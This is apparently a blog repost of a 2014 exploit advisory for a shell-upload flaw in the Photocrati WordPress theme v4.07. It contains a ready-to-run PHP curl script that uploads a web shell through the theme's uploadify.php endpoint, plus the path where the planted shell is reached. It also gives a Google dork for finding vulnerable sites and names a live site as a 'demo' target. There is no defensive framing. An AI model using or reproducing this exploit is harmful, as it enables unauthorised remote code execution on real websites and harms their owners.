728x90
# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability # Author : Aloulou # Date : 13/05/2014 # Facebook : http: //www.facebook.com/Aloulou.TN # Email: aloulou@alquds.com # Vendor : www.photocrati.com # Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/ # Tested on : Linux ############################################################################ Exploit: <?php $uploadfile = "shell.php" ; $ch = curl_init( "http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/uploadify.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS, array ( 'Filedata' => "@$uploadfile" , 'folder' => '/admin/scripts/' )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); print "$postResult" ; ?> ShellAccess: http: //127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php Demo:http: //www.tanguygilson.com # Greeting to : Tunisia , CyberPink , Brikovich , Anonboy ############################################################################ # 2935E278AA2F72DF 1337day.com [2014-05-15] 0E88B39FD8DD85B4 # |
728x90
'Metasploit ' 카테고리의 다른 글
Punking Pet Peeves with PowerShell (0) | 2014.05.17 |
---|---|
Broadcom PIPA C211 - Sensitive Information Disclosure (0) | 2014.05.16 |
PayPal Filter Bypass (0) | 2014.05.15 |
Adobe Flash Player Shader Buffer Overflow (0) | 2014.05.14 |
Adobe Flash Player Shader Buffer Overflow(CVE-2014-0515) (0) | 2014.05.13 |